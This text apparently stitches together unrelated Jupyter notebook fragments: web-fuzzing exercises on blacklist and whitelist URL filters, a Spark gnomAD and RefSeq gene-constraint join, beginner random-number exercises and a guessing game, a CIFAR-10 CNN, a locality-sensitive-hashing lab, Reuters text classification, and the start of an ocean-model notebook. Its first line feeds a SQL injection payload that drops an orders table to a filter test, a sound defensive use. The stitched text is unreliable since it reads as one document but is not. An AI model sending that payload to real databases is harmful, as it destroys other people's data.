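print(blacklist("/order?item=tshirt&name=Robert%27%29%3B+DROP+TABLE+orders%3B+--"))
```

Note the decoding step: without `unquote_plus()`, a percent-encoded payload would slip past every pattern.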
#### Part 2: A Whitelisting Filter
Set up a filter function `whitelist(url)` that returns `True` for URLs that are allowed to reach the server. Check the URL for whether it conforms to expectations; use a [parser](Parser.ipynb) and a dedicated grammar for this purpose.
**Solution.** Left to the reader.
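As a starting point for Part 2, here is a hedged sketch that uses a regular expression as a stand-in for the grammar-based parser the exercise asks for; the field names and value shapes are assumptions based on the order form used in this chapter:

```python
import re

# Assumed shape of a legitimate order URL; a grammar + parser would be more precise
ORDER_URL_RE = re.compile(
    r"^/order\?item=\w+"
    r"&name=[\w.+\-]+"
    r"&email=[\w.+\-]+%40[\w.\-]+"
    r"&city=[\w.+\-]+"
    r"&zip=\d{5}$")

def whitelist(url: str) -> bool:
    """Return True only for URLs that conform to the expected order format."""
    return ORDER_URL_RE.match(url) is not None

print(whitelist("/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104"))
print(whitelist("/order?item=tshirt&name=Robert'); DROP TABLE orders; --"))
```

In contrast to blacklisting, a whitelist rejects anything it does not recognize, which is the safer default.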
### Exercise 3: Input Patterns
To fill out forms, fuzzers could be much smarter in how they generate input values. Starting with HTML 5, input fields can have a `pattern` attribute defining a _regular expression_ that an input value has to satisfy. A 5-digit ZIP code, for instance, could be defined by the pattern
```html
<input type="text" pattern="[0-9][0-9][0-9][0-9][0-9]">
```
Extract such patterns from the HTML page and convert them into equivalent grammar production rules, ensuring that only inputs satisfying the patterns are produced.
**Solution.** Left to the reader at this point.
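As a first step towards a solution, one can extract the `pattern` attributes with the standard library's `html.parser`; converting each regular expression into grammar production rules then remains as the exercise. This sketch only does the extraction:

```python
from html.parser import HTMLParser

class PatternExtractor(HTMLParser):
    """Collect the `pattern` attributes of all <input> elements."""
    def __init__(self):
        super().__init__()
        self.patterns = []

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            attrs = dict(attrs)
            if "pattern" in attrs:
                self.patterns.append(attrs["pattern"])

extractor = PatternExtractor()
extractor.feed('<input type="text" pattern="[0-9][0-9][0-9][0-9][0-9]">')
print(extractor.patterns)
```

For the ZIP pattern above, the corresponding grammar rule could expand a `<zip>` symbol into five `<digit>` symbols.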
### Exercise 4: Coverage-Driven Web Fuzzing
Combine the above fuzzers with [coverage-driven](GrammarCoverageFuzzer.ipynb) and [search-based](SearchBasedFuzzer.ipynb) approaches to maximize feature and code coverage.
**Solution.** Left to the reader at this point.
## Ensembl to RefSeq Mapping
The constraint table from gnomAD has duplicate gene IDs – in the case of TUBB3, one gene ID is misannotated. Given that our analysis is by transcript, it is probably better to use the transcript table from gnomAD. However, gnomAD uses Ensembl transcripts while we used RefSeq transcripts. We can map between the two through BioMart:
http://www.ensembl.org/biomart/martview/e81bf786e69482239d8e7799ec2c9e9e
```
import org.apache.spark.sql.{Row, SparkSession}
import org.apache.spark.sql.types._
import org.apache.spark.sql.functions._
import org.apache.spark.sql.expressions.Window
val customSchema = new StructType(Array(
StructField("GeneID",StringType,true),
StructField("GeneIDVer",StringType,true),
StructField("TranscriptID",StringType,true),
StructField("TranscriptIDVer",StringType,true),
StructField("EnsemblGeneSymbol",StringType,true),
StructField("GeneType",StringType,true),
StructField("GENE",StringType,true),
StructField("RefSeq",StringType,true),
StructField("NCBIGeneID",IntegerType,true)))
val df_ens2ref = (spark.read
.format("csv")
.option("header", "true")
.option("delimiter", "\t")
.option("nullValue", "")
.schema(customSchema)
.load("s3://nch-igm-research-projects/rna_stability/peter/ensembl_2_refeq.txt")
)
df_ens2ref.printSchema
df_ens2ref.filter($"GENE" === "TUBB3").show
```
Double-check that there are no duplicates:
```
val df_ref2ens = df_ens2ref.filter($"RefSeq".isNotNull).select("TranscriptID","RefSeq").sort($"TranscriptID").distinct
df_ref2ens.show
df_ref2ens.count
df_ref2ens.select($"RefSeq").distinct.count
df_ref2ens.groupBy($"RefSeq").count.sort($"count".desc).show
```
## gnomAD lof metrics by transcript
We want to link the data to gnomAD constraint metrics (LOEUF and pLI):
Supplemental Table describing data fields:
https://static-content.springer.com/esm/art%3A10.1038%2Fs41586-020-2308-7/MediaObjects/41586_2020_2308_MOESM1_ESM.pdf
Select the following columns from the main file:
* **gene**: Gene name
* **gene_id**: Ensembl gene ID
* **transcript**: Ensembl transcript ID (Gencode v19)
* **obs_mis**: Number of observed missense variants in transcript
* **exp_mis**: Number of expected missense variants in transcript
* **oe_mis**: Observed over expected ratio for missense variants in transcript (obs_mis divided by exp_mis)
* **obs_syn**: Number of observed synonymous variants in transcript
* **exp_syn**: Number of expected synonymous variants in transcript
* **oe_syn**: Observed over expected ratio for synonymous variants in transcript (obs_syn divided by exp_syn)
* **p**: The estimated proportion of haplotypes with a pLoF variant. Defined as: 1 - sqrt(no_lofs / defined)
* **pLI**: Probability of loss-of-function intolerance; probability that transcript falls into distribution of haploinsufficient genes (~9% o/e pLoF ratio; computed from gnomAD data)
* **pRec**: Probability that transcript falls into distribution of recessive genes (~46% o/e pLoF ratio; computed from gnomAD data)
* **pNull**: Probability that transcript falls into distribution of unconstrained genes (~100% o/e pLoF ratio; computed from gnomAD data)
* **oe_lof_upper**: LOEUF: upper bound of 90% confidence interval for o/e ratio for pLoF variants (lower values indicate more constrained)
* **oe_lof_upper_rank**: Transcript’s rank of LOEUF value compared to all transcripts (lower values indicate more constrained)
* **oe_lof_upper_bin**: Decile bin of LOEUF for given transcript (lower values indicate more constrained)
```
val cols_constraint = Seq("gene","gene_id","transcript","obs_mis","exp_mis","oe_mis","obs_syn","exp_syn","oe_syn",
"p","pLI","pRec","pNull","oe_lof_upper","oe_lof_upper_rank","oe_lof_upper_bin")
val df_loft_import = (spark.read
.format("csv")
.option("header", "true")
.option("delimiter", "\t")
.option("inferSchema", "true")
.option("nullValue", "NA")
.option("nanValue", "NA")
.load("s3://nch-igm-research-projects/rna_stability/peter/gnomad.v2.1.1.lof_metrics.by_transcript.txt")
.select(cols_constraint.map(col): _*)
)
val df_loft = (df_loft_import.withColumn("p",col("p").cast(DoubleType))
.withColumn("pLI",col("pLI").cast(DoubleType))
.withColumn("pRec",col("pRec").cast(DoubleType))
.withColumn("pNull",col("pNull").cast(DoubleType))
.withColumn("oe_lof_upper",col("oe_lof_upper").cast(DoubleType))
.withColumn("oe_lof_upper_rank",col("oe_lof_upper_rank").cast(IntegerType))
.withColumn("oe_lof_upper_bin",col("oe_lof_upper_bin").cast(IntegerType))
.withColumnRenamed("gene", "gnomadGeneSymbol")
.withColumnRenamed("gene_id", "gnomadGeneID")
.withColumnRenamed("transcript", "TranscriptID")
)
df_loft.printSchema
df_loft.filter($"gnomadGeneSymbol" === "TUBB3").show
```
Let's check that TranscriptID is not duplicated:
```
df_loft.select($"TranscriptID").distinct.count
df_loft.count
df_loft.filter($"p".isNotNull && $"pLI" < 0.9).
select("gnomadGeneSymbol","p","pLI","oe_lof_upper","oe_lof_upper_rank","oe_lof_upper_bin").sort($"pLI".desc).show
```
## Join gnomAD lof table to RefSeq to Ensembl table
```
val df_loft_ref = (df_loft.as("df_loft")
.join(df_ref2ens.as("df_ref2ens"), $"df_loft.TranscriptID" === $"df_ref2ens.TranscriptID", "inner")
.drop($"df_ref2ens.TranscriptID"))
```
Note that the number of rows has now increased from 80,950 to 95,806 – this is because Ensembl transcripts can map to multiple RefSeq transcripts and vice versa. We now need to make a table where the RefSeq field is not duplicated.
```
df_loft_ref.groupBy($"RefSeq").count.sort($"count".desc).show
```
For duplicate RefSeqs we will choose the row with the highest pLI value (i.e., most constrained) and, where pLI ties, the lowest oe_lof_upper_rank (i.e., most constrained).
```
df_loft_ref.filter($"RefSeq" === "NM_206955" || $"RefSeq" === "NM_145021").show
val df_high_pLI = df_loft_ref.groupBy($"RefSeq").agg(max($"pLI"), min($"oe_lof_upper_rank"))
df_high_pLI.filter($"RefSeq" === "NM_206955" || $"RefSeq" === "NM_145021").show
```
Finally, create a table with unique RefSeq entries by joining to the high-pLI table:
```
val df_loft_ref_uniq = ( df_loft_ref.join(df_high_pLI.as("pli"),
df_loft_ref("RefSeq") === df_high_pLI("RefSeq") &&
df_loft_ref("pLI") === df_high_pLI("max(pLI)") &&
df_loft_ref("oe_lof_upper_rank") === df_high_pLI("min(oe_lof_upper_rank)"),
"inner")
.drop($"pli.RefSeq").drop($"pli.max(pLI)").drop($"pli.min(oe_lof_upper_rank)") )
df_loft_ref_uniq.groupBy($"RefSeq").count.sort($"count".desc).show
df_loft_ref_uniq.orderBy(rand()).limit(10).show
```
Constrained genes are those with a pLI >= 0.9:
```
df_loft_ref_uniq.filter($"pLI" >= 0.9).groupBy($"oe_lof_upper_bin").count.sort($"count".desc).show
```
Probability that transcript falls into distribution of unconstrained genes
```
df_loft_ref_uniq.filter($"pNull" <= 0.05).groupBy($"oe_lof_upper_bin").count.sort($"count".desc).show
df_loft_ref_uniq.filter($"pNull" > 0.05).groupBy($"oe_lof_upper_bin").count.sort($"count".desc).show
```
Probability that transcript falls into distribution of recessive genes (~46% o/e pLoF ratio; computed from gnomAD data)
```
df_loft_ref_uniq.filter($"pRec" <= 0.05).groupBy($"oe_lof_upper_bin").count.sort($"count".desc).show
df_loft_ref_uniq.filter($"pRec" > 0.05).groupBy($"oe_lof_upper_bin").count.sort($"count".desc).show
```
### Write out gnomAD pLI with RefSeq Metrics
```
(df_loft_ref_uniq.write.mode("overwrite")
.parquet("s3://nch-igm-research-projects/rna_stability/peter/gnomAD_pLI_RefSeq.parquet"))
```
Exercise 1: Compute the square root of the mean of n random integers, each in the range [m, k].
```
import random, math

def test():
    total = 0
    for _ in range(n):
        number = random.randint(m, k)
        print('Random integer:', number)
        total += number
    average = total / n
    return math.sqrt(average)

# main program
m = int(input('Enter the lower bound (an integer): '))
k = int(input('Enter the upper bound (an integer): '))
n = int(input('How many random integers? '))
test()
```
Exercise 2: Write functions that generate n random integers in the range [m, k] (n, m, k entered by the user) and compute (1) the sum of log(random integer) over all of them, and (2) the sum of 1/log(random integer).
```
import random, math

def test1():
    result = 0
    for _ in range(n):
        number = random.randint(m, k)
        print('Run 1 random integer:', number)
        result += math.log10(number)
    return result

def test2():
    # note: assumes m > 1, since log10(1) == 0 would cause a division by zero
    result = 0
    for _ in range(n):
        number = random.randint(m, k)
        print('Run 2 random integer:', number)
        result += 1 / math.log10(number)
    return result

# main program
n = int(input('How many random integers? '))
m = int(input('Enter the lower bound (an integer): '))
k = int(input('Enter the upper bound (an integer): '))
print()
print('Result of run 1:', test1())
print()
print('Result of run 2:', test2())
```
Exercise 3: Write a function computing s = a + aa + aaa + aaaa + aa...a, where a is a random integer in [1, 9]. For example, 2 + 22 + 222 + 2222 + 22222 (five terms here); the number of terms is entered from the keyboard.
```
import random

def test():
    a = random.randint(1, 9)
    print('Random digit a:', a)
    number = 0   # current term: a, aa, aaa, ...
    total = 0
    for i in range(n):
        number += a * 10**i
        total += number
    return total

# main program
n = int(input('How many terms to add? '))
print('Result:', test())
```
Challenge exercise: Following task5, turn the guessing game around: the user picks an arbitrary integer and the computer guesses it. The approach mirrors task5, but with the roles reversed: the human judges whether each guess is too high, too low, or correct. Write the complete game.
```
import random, math
def win():
print(
'''
======YOU WIN=======
."". ."",
| | / /
| | / /
| | / /
| |/ ;-._
} ` _/ / ;
| /` ) / /
| / /_/\_/\
|/ / |
( ' \ '- |
\ `. /
| |
| |
======YOU WIN=======
'''
)
def lose():
print(
'''
======YOU LOSE=======
.-" "-.
/ \
| |
|, .-. .-. ,|
| )(__/ \__)( |
|/ /\ \|
(@_ (_ ^^ _)
_ ) \_______\__|IIIIII|__/__________________________
(_)@8@8{}<________|-\IIIIII/-|___________________________>
)_/ \ /
(@ `--------`
======YOU LOSE=======
'''
)
def game_over():
print(
'''
======GAME OVER=======
_________
/ ======= \
/ __________\
| ___________ |
| | - | |
| | | |
| |_________| |________________
\=____________/ )
/ """"""""""" \ /
/ ::::::::::::: \ =D-'
(_________________)
======GAME OVER=======
'''
)
def show_team():
    print('''
    *** Credits ***
    This game was developed by PXS''')
def show_instruction():
    print('''
    How to play
    The player picks an arbitrary integer, and the computer tries to guess it.
    If the computer guesses the number within the allowed number of tries, the computer wins.
    Otherwise, the player wins.''')
def menu():
    print('''
    ===== Game menu =====
    1. Instructions
    2. Start game
    3. Quit
    4. Credits
    ===== Game menu =====''')
def guess_game():
    n = int(input('Enter a positive integer as the upper bound for the secret number: '))
    max_times = int(math.log(n, 2))
    print('Allowed number of guesses:', max_times)
    print()
    guess = random.randint(1, n)
    print('My guess is:', guess)
    guess_times = 1
    max_number = n
    min_number = 1
    while guess_times < max_times:
        answer = input('Did I guess it? (enter "yes" or "no") ')
        if answer == 'yes':
            lose()
            break
        if answer == 'no':
            x = input('Was my guess too high or too low? (enter "high" or "low") ')
            print()
            if x == 'high':
                max_number = guess - 1
            elif x == 'low':
                min_number = guess + 1
            else:
                continue
            guess = random.randint(min_number, max_number)
            print('My guess is:', guess)
            guess_times += 1
            print('I have guessed', guess_times, 'times')
            print()
            if guess_times == max_times:
                ask = input('''*** Guess limit reached ***
Did I guess it? (enter "yes" or "no") ''')
                if ask == 'no':
                    end()
                else:
                    lose()
                break
def end():
    a = input('What was your secret number? ')
    print()
    print('So it was', a, '!')
    win()
# main function
def main():
    while True:
        menu()
        choice = int(input('Enter your choice: '))
        if choice == 1:
            show_instruction()
        elif choice == 2:
            guess_game()
        elif choice == 3:
            game_over()
            break
        else:
            show_team()
# main program
if __name__ == '__main__':
    main()
```
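The guess limit `int(math.log(n, 2))` in the code above implicitly assumes the computer halves the search range on each turn, yet `random.randint()` only narrows it by chance. A minimal sketch of a deterministic bisection guesser (answers computed instead of typed in) shows that ceil(log2(n)) guesses always suffice:

```python
import math

def bisect_guess(secret, n):
    """Guess an integer in [1, n] by bisection; return the number of guesses used."""
    low, high, guesses = 1, n, 0
    while low <= high:
        guess = (low + high) // 2
        guesses += 1
        if guess == secret:
            return guesses
        elif guess > secret:
            high = guess - 1    # the guess was too high
        else:
            low = guess + 1     # the guess was too low
    return guesses

n = 1000
worst = max(bisect_guess(secret, n) for secret in range(1, n + 1))
print('worst case:', worst, 'guesses; ceil(log2(n)) =', math.ceil(math.log2(n)))
```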
<a href="https://colab.research.google.com/github/parthsaxena1909/Image-Classifer-using-CIFRA10/blob/master/CNN_Keras_imageClassfier.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
```
import tensorflow as tf
import os
import numpy as np
from matplotlib import pyplot as plt
%matplotlib inline
if not os.path.isdir('models'):
os.mkdir('models')
print('Tensorflow Version:', tf.__version__)
print('is using GPU?', tf.test.is_gpu_available())
def get_three_classes(x, y):
    # keep only classes 0 (airplane), 1 (automobile) and 2 (bird)
    indices_0, _ = np.where(y == 0.)
    indices_1, _ = np.where(y == 1.)
    indices_2, _ = np.where(y == 2.)
    indices = np.concatenate([indices_0, indices_1, indices_2], axis=0)
    x = x[indices]
    y = y[indices]
    # shuffle the examples
    count = x.shape[0]
    indices = np.random.choice(range(count), count, replace=False)
    x = x[indices]
    y = y[indices]
    y = tf.keras.utils.to_categorical(y)
    return x, y
(x_train, y_train), (x_test, y_test) = tf.keras.datasets.cifar10.load_data()
x_train, y_train = get_three_classes(x_train, y_train)
x_test, y_test = get_three_classes(x_test, y_test)
print(x_train.shape,y_train.shape)
print(x_test.shape,y_test.shape)
class_names = ['aeroplane','car','bird']
def show_random_examples(x,y,p):
indices = np.random.choice(range(x.shape[0]), 10, replace = False)
x=x[indices]
y=y[indices]
p=p[indices]
plt.figure(figsize = (10,5))
for i in range(10):
plt.subplot(2,5,1+i)
plt.imshow(x[i])
plt.xticks([])
plt.yticks([])
col = 'green' if np.argmax(y[i]) == np.argmax(p[i]) else 'red'
plt.xlabel(class_names[np.argmax(p[i])], color = col)
plt.show()
show_random_examples(x_train,y_train,y_train)
show_random_examples(x_test,y_test,y_test)
from tensorflow.keras.layers import Conv2D, MaxPooling2D, BatchNormalization
from tensorflow.keras.layers import Dropout, Flatten, Input,Dense
def create_model():
def add_conv_block(model, num_filters):
model.add(Conv2D(num_filters,3,activation='relu',padding='same'))
model.add(BatchNormalization())
model.add(Conv2D(num_filters,3,activation='relu',padding='valid'))
model.add(MaxPooling2D(pool_size= 2))
model.add(Dropout(0.5))
return model
model = tf.keras.models.Sequential()
model.add(Input(shape=(32,32,3)))
model = add_conv_block(model,32)
model= add_conv_block(model,64)
model = add_conv_block(model,128)
model.add(Flatten())
model.add(Dense(3,activation='softmax'))
model.compile(
loss = 'categorical_crossentropy',
optimizer= 'adam', metrics=['accuracy']
)
return model
model = create_model()
model.summary()
h = model.fit(
x_train/255.,y_train,
validation_data=(x_test/255.,y_test),
epochs=10, batch_size = 128,
callbacks=[
tf.keras.callbacks.EarlyStopping(monitor='val_accuracy',patience=3),
tf.keras.callbacks.ModelCheckpoint(
'models/model_{val_accuracy:.3f}.h5',
save_best_only=True, save_weights_only=False,
monitor = 'val_accuracy'
)
]
)
accs= h.history['accuracy']
val_accs= h.history['val_accuracy']
plt.plot(range(len(accs)),accs,label='Training')
plt.plot(range(len(accs)),val_accs,label='Validation')
plt.legend()
plt.show()
model=tf.keras.models.load_model('models/model_0.877.h5')
preds=model.predict(x_test/255.)
show_random_examples(x_test,y_test,preds)
```
# Locality Sensitive Hashing
```
import numpy as np
import pandas as pd
from scipy.sparse import csr_matrix
from sklearn.metrics.pairwise import pairwise_distances
import time
from copy import deepcopy
import matplotlib.pyplot as plt
%matplotlib inline
'''compute norm of a sparse vector
Thanks to: Jaiyam Sharma'''
def norm(x):
sum_sq=x.dot(x.T)
norm=np.sqrt(sum_sq)
return(norm)
```
## Load in the Wikipedia dataset
```
wiki = pd.read_csv('people_wiki.csv')
wiki.head()
```
## Extract TF-IDF matrix
```
def load_sparse_csr(filename):
loader = np.load(filename)
data = loader['data']
indices = loader['indices']
indptr = loader['indptr']
shape = loader['shape']
return csr_matrix((data, indices, indptr), shape)
corpus = load_sparse_csr('people_wiki_tf_idf.npz')
assert corpus.shape == (59071, 547979)
print('Check passed correctly!')
```
## Train an LSH model
```
def generate_random_vectors(num_vector, dim):
return np.random.randn(dim, num_vector)
# Generate 3 random vectors of dimension 5, arranged into a single 5 x 3 matrix.
np.random.seed(0) # set seed=0 for consistent results
generate_random_vectors(num_vector=3, dim=5)
# Generate 16 random vectors of dimension 547979
np.random.seed(0)
random_vectors = generate_random_vectors(num_vector=16, dim=547979)
random_vectors.shape
doc = corpus[0, :] # vector of tf-idf values for document 0
doc.dot(random_vectors[:, 0]) >= 0 # True if positive sign; False if negative sign
doc.dot(random_vectors[:, 1]) >= 0 # True if positive sign; False if negative sign
doc.dot(random_vectors) >= 0 # should return an array of 16 True/False bits
np.array(doc.dot(random_vectors) >= 0, dtype=int) # display index bits in 0/1's
corpus[0:2].dot(random_vectors) >= 0 # compute bit indices of first two documents
corpus.dot(random_vectors) >= 0 # compute bit indices of ALL documents
doc = corpus[0, :] # first document
index_bits = (doc.dot(random_vectors) >= 0)
powers_of_two = (1 << np.arange(15, -1, -1))
print(index_bits)
print(powers_of_two)
print(index_bits.dot(powers_of_two))
index_bits = corpus.dot(random_vectors) >= 0
index_bits.dot(powers_of_two)
def train_lsh(data, num_vector=16, seed=None):
dim = data.shape[1]
if seed is not None:
np.random.seed(seed)
random_vectors = generate_random_vectors(num_vector, dim)
powers_of_two = 1 << np.arange(num_vector-1, -1, -1)
table = {}
# Partition data points into bins
bin_index_bits = (data.dot(random_vectors) >= 0)
# Encode bin index bits into integers
bin_indices = bin_index_bits.dot(powers_of_two)
# Update `table` so that `table[i]` is the list of document ids with bin index equal to i.
for data_index, bin_index in enumerate(bin_indices):
if bin_index not in table:
# If no list yet exists for this bin, assign the bin an empty list.
table[bin_index] = []
# Fetch the list of document ids associated with the bin and add the document id to the end.
table[bin_index].append(data_index)
model = {'data': data,
'bin_index_bits': bin_index_bits,
'bin_indices': bin_indices,
'table': table,
'random_vectors': random_vectors,
'num_vector': num_vector}
return model
model = train_lsh(corpus, num_vector=16, seed=143)
table = model['table']
if 0 in table and table[0] == [39583] and \
143 in table and table[143] == [19693, 28277, 29776, 30399]:
print('Passed!')
else:
print('Check your code.')
```
## Inspect bins
```
wiki[wiki['name'] == 'Barack Obama']
print(model['bin_indices'][35817])
wiki[wiki['name'] == 'Joe Biden']
print(np.array(model['bin_index_bits'][24478], dtype=int)) # list of 0/1's
print(model['bin_indices'][24478]) # integer format
sum(model['bin_index_bits'][24478] == model['bin_index_bits'][35817])
wiki[wiki['name']=='Wynn Normington Hugh-Jones']
print(np.array(model['bin_index_bits'][22745], dtype=int)) # list of 0/1's
print(model['bin_indices'][22745])# integer format
model['bin_index_bits'][35817] == model['bin_index_bits'][22745]
model['table'][model['bin_indices'][35817]]
doc_ids = list(model['table'][model['bin_indices'][35817]])
doc_ids.remove(35817) # display documents other than Obama
docs = wiki[wiki.index.isin(doc_ids)]
docs
def cosine_distance(x, y):
xy = x.dot(y.T)
dist = xy/(norm(x)*norm(y))
return 1-dist[0,0]
obama_tf_idf = corpus[35817,:]
biden_tf_idf = corpus[24478,:]
print('================= Cosine distance from Barack Obama')
print('Barack Obama - {0:24s}: {1:f}'.format('Joe Biden',
cosine_distance(obama_tf_idf, biden_tf_idf)))
for doc_id in doc_ids:
doc_tf_idf = corpus[doc_id,:]
print('Barack Obama - {0:24s}: {1:f}'.format(wiki.iloc[doc_id]['name'],
cosine_distance(obama_tf_idf, doc_tf_idf)))
```
## Query the LSH model
```
from itertools import combinations
num_vector = 16
search_radius = 3
for diff in combinations(range(num_vector), search_radius):
print(diff)
def search_nearby_bins(query_bin_bits, table, search_radius=2, initial_candidates=set()):
"""
For a given query vector and trained LSH model, return all candidate neighbors for
the query among all bins within the given search radius.
Example usage
-------------
>>> model = train_lsh(corpus, num_vector=16, seed=143)
>>> q = model['bin_index_bits'][0] # vector for the first document
>>> candidates = search_nearby_bins(q, model['table'])
"""
num_vector = len(query_bin_bits)
powers_of_two = 1 << np.arange(num_vector-1, -1, -1)
# Allow the user to provide an initial set of candidates.
candidate_set = deepcopy(initial_candidates)
for different_bits in combinations(range(num_vector), search_radius):
# Flip the bits (n_1,n_2,...,n_r) of the query bin to produce a new bit vector.
## Hint: you can iterate over a tuple like a list
alternate_bits = deepcopy(query_bin_bits)
for i in different_bits:
alternate_bits[i] = 1 - alternate_bits[i]  # flip bit i of the query bin
# Convert the new bit vector to an integer index
nearby_bin = alternate_bits.dot(powers_of_two)
# Fetch the list of documents belonging to the bin indexed by the new bit vector.
# Then add those documents to candidate_set
# Make sure that the bin exists in the table!
# Hint: update() method for sets lets you add an entire list to the set
if nearby_bin in table:
candidate_set.update(table[nearby_bin])  # add every document in this bin to the candidate set
return candidate_set
obama_bin_index = model['bin_index_bits'][35817] # bin index of Barack Obama
candidate_set = search_nearby_bins(obama_bin_index, model['table'], search_radius=0)
if candidate_set == set([35817, 21426, 53937, 39426, 50261]):
print('Passed test')
else:
print('Check your code')
print('List of documents in the same bin as Obama: 35817, 21426, 53937, 39426, 50261')
candidate_set = search_nearby_bins(obama_bin_index, model['table'], search_radius=1, initial_candidates=candidate_set)
if candidate_set == set([39426, 38155, 38412, 28444, 9757, 41631, 39207, 59050, 47773, 53937, 21426, 34547,
23229, 55615, 39877, 27404, 33996, 21715, 50261, 21975, 33243, 58723, 35817, 45676,
19699, 2804, 20347]):
print('Passed test')
else:
print('Check your code')
def query(vec, model, k, max_search_radius):
data = model['data']
table = model['table']
random_vectors = model['random_vectors']
num_vector = random_vectors.shape[1]
# Compute bin index for the query vector, in bit representation.
bin_index_bits = (vec.dot(random_vectors) >= 0).flatten()
# Search nearby bins and collect candidates
candidate_set = set()
for search_radius in range(max_search_radius+1):
candidate_set = search_nearby_bins(bin_index_bits, table, search_radius, initial_candidates=candidate_set)
# Sort candidates by their true distances from the query
nearest_neighbors = pd.DataFrame({'id':list(candidate_set)})
candidates = data[np.array(list(candidate_set)),:]
nearest_neighbors['distance'] = pairwise_distances(candidates, vec, metric='cosine').flatten()
return nearest_neighbors.nsmallest(k, 'distance')[['id','distance']], len(candidate_set)
query(corpus[35817,:], model, k=10, max_search_radius=3)
query(corpus[35817,:], model, k=10, max_search_radius=3)[0].set_index('id').join(wiki[['name']], how='inner').sort_values('distance')
```
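The bin-index arithmetic used by `search_nearby_bins` can be sketched standalone: flip `search_radius` bits of the query's bit vector and convert each variant to an integer, exactly as the big-endian `powers_of_two` dot product does. A minimal sketch (names are illustrative, not from the notebook):

```python
from itertools import combinations

def bits_to_index(bits):
    # interpret a bit list as a big-endian binary integer
    index = 0
    for b in bits:
        index = (index << 1) | b
    return index

def nearby_bin_indices(query_bits, search_radius):
    # integer indices of every bin whose bit vector differs from the
    # query in exactly `search_radius` positions
    indices = []
    for flip in combinations(range(len(query_bits)), search_radius):
        alt = list(query_bits)
        for i in flip:
            alt[i] = 1 - alt[i]
        indices.append(bits_to_index(alt))
    return indices

print(bits_to_index([1, 0, 1]))          # 5
print(nearby_bin_indices([0, 0, 0], 1))  # [4, 2, 1]
```

With radius 0 only the query's own bin is returned; each extra unit of radius adds all bins one more bit-flip away, which is why the candidate set grows so quickly with `max_search_radius`.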
|
github_jupyter
|
# Classification
```
from nltk.corpus import reuters
import spacy
import re
import numpy as np
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.preprocessing import MultiLabelBinarizer
from sklearn.svm import LinearSVC
from sklearn.multiclass import OneVsRestClassifier
from sklearn.metrics import f1_score, precision_score, recall_score
nlp = spacy.load("en_core_web_md")
def tokenize(text):
min_length = 3
tokens = [word.lemma_ for word in nlp(text) if not word.is_stop]
p = re.compile('[a-zA-Z]+')
filtered_tokens = list(filter(lambda token: p.match(token) and len(token) >= min_length, tokens))
return filtered_tokens
def represent_tfidf(train_docs, test_docs):
representer = TfidfVectorizer(tokenizer=tokenize)
# Learn and transform train documents
vectorised_train_documents = representer.fit_transform(train_docs)
vectorised_test_documents = representer.transform(test_docs)
return vectorised_train_documents, vectorised_test_documents
def doc2vec(text):
min_length = 3
p = re.compile('[a-zA-Z]+')
tokens = [token for token in nlp(text) if not token.is_stop and
p.match(token.text) and
len(token.text) >= min_length]
doc = np.average([token.vector for token in tokens], axis=0)
return doc
def represent_doc2vec(train_docs, test_docs):
vectorised_train_documents = [doc2vec(doc) for doc in train_docs]
vectorised_test_documents = [doc2vec(doc) for doc in test_docs]
return vectorised_train_documents, vectorised_test_documents
def evaluate(test_labels, predictions):
precision = precision_score(test_labels, predictions, average='micro')
recall = recall_score(test_labels, predictions, average='micro')
f1 = f1_score(test_labels, predictions, average='micro')
print("Micro-average quality numbers")
print("Precision: {:.4f}, Recall: {:.4f}, F1-measure: {:.4f}".format(precision, recall, f1))
precision = precision_score(test_labels, predictions, average='macro')
recall = recall_score(test_labels, predictions, average='macro')
f1 = f1_score(test_labels, predictions, average='macro')
print("Macro-average quality numbers")
print("Precision: {:.4f}, Recall: {:.4f}, F1-measure: {:.4f}".format(precision, recall, f1))
documents = reuters.fileids()
train_docs_id = list(filter(lambda doc: doc.startswith("train"), documents))
test_docs_id = list(filter(lambda doc: doc.startswith("test"), documents))
train_docs = [reuters.raw(doc_id) for doc_id in train_docs_id]
test_docs = [reuters.raw(doc_id) for doc_id in test_docs_id]
# Transform multilabel labels
mlb = MultiLabelBinarizer()
train_labels = mlb.fit_transform([reuters.categories(doc_id) for doc_id in train_docs_id])
test_labels = mlb.transform([reuters.categories(doc_id) for doc_id in test_docs_id])
# TFIDF Experiment
model = OneVsRestClassifier(LinearSVC(random_state=42))
vectorised_train_docs, vectorised_test_docs = represent_tfidf(train_docs, test_docs)
model.fit(vectorised_train_docs, train_labels)
predictions = model.predict(vectorised_test_docs)
evaluate(test_labels, predictions)
# Embeddings Experiment
model = OneVsRestClassifier(LinearSVC(random_state=42))
vectorised_train_docs, vectorised_test_docs = represent_doc2vec(train_docs, test_docs)
model.fit(vectorised_train_docs, train_labels)
predictions = model.predict(vectorised_test_docs)
evaluate(test_labels, predictions)
```
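The micro/macro distinction in `evaluate` is easiest to see in a tiny hand computation: micro-averaging pools all label decisions before computing the metric, while macro-averaging computes the metric per label and then takes an unweighted mean. A sketch with made-up per-label counts:

```python
# per-label (true positive, false positive) counts for three labels
counts = [(90, 10), (5, 5), (1, 9)]

# micro-average: pool all decisions, then compute precision once
tp = sum(t for t, f in counts)
fp = sum(f for t, f in counts)
micro_precision = tp / (tp + fp)

# macro-average: per-label precision, then unweighted mean
per_label = [t / (t + f) for t, f in counts]
macro_precision = sum(per_label) / len(per_label)

print(round(micro_precision, 3))  # 0.8
print(round(macro_precision, 3))  # 0.5
```

On a skewed label set like Reuters, frequent labels dominate the micro average while rare labels drag the macro average down, which is why the notebook reports both.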
|
github_jupyter
|
This notebook contains Hovmoller plots that compare the model output over many different depths to the results from the ORCA Buoy data.
```
import sys
sys.path.append('/ocean/kflanaga/MEOPAR/analysis-keegan/notebooks/Tools')
import numpy as np
import matplotlib.pyplot as plt
import os
import pandas as pd
import netCDF4 as nc
import xarray as xr
import datetime as dt
from salishsea_tools import evaltools as et, viz_tools, places
import gsw
import matplotlib.gridspec as gridspec
import matplotlib as mpl
import matplotlib.dates as mdates
import cmocean as cmo
import scipy.interpolate as sinterp
import math
from scipy import io
import pickle
import cmocean
import json
import Keegan_eval_tools as ket
from collections import OrderedDict
from matplotlib.colors import LogNorm
fs=16
mpl.rc('xtick', labelsize=fs)
mpl.rc('ytick', labelsize=fs)
mpl.rc('legend', fontsize=fs)
mpl.rc('axes', titlesize=fs)
mpl.rc('axes', labelsize=fs)
mpl.rc('figure', titlesize=fs)
